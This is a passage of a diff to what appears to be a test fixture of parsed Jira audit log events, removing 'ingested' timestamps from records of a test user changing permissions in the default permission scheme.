scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1815,7 +1790,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924725886Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.229Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1884,7 +1858,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924726804Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.227Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1958,7 +1931,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924727678Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.225Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2027,7 +1999,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924728604Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.223Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2096,7 +2067,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924729524Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.221Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2170,7 +2140,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924730390Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.219Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2239,7 +2208,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924731259Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.217Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2313,7 +2281,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924732141Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.215Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2382,7 +2349,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924733089Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.212Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2456,7 +2422,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924734069Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.210Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2530,7 +2495,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924734945Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.208Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Voters and Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2599,7 +2563,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924735814Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.204Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Modify Reporter\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2673,7 +2636,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924736734Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.190Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Schedule Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2742,7 +2704,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924737609Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.187Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Move Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2811,7 +2772,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924738836Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.184Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Administer Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2885,7 +2845,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924739715Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.182Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Link Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -2954,7 +2913,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924740593Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.180Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Work On Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3023,7 +2981,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924741461Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.178Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3092,7 +3049,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924742334Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.176Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Close Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3161,7 +3117,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924743266Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.174Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assignable User\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3230,7 +3185,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924744136Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.173Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3304,7 +3258,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924745010Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.171Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Add Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3373,7 +3326,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924745874Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.168Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Resolve Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3442,7 +3394,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924746741Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.166Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software 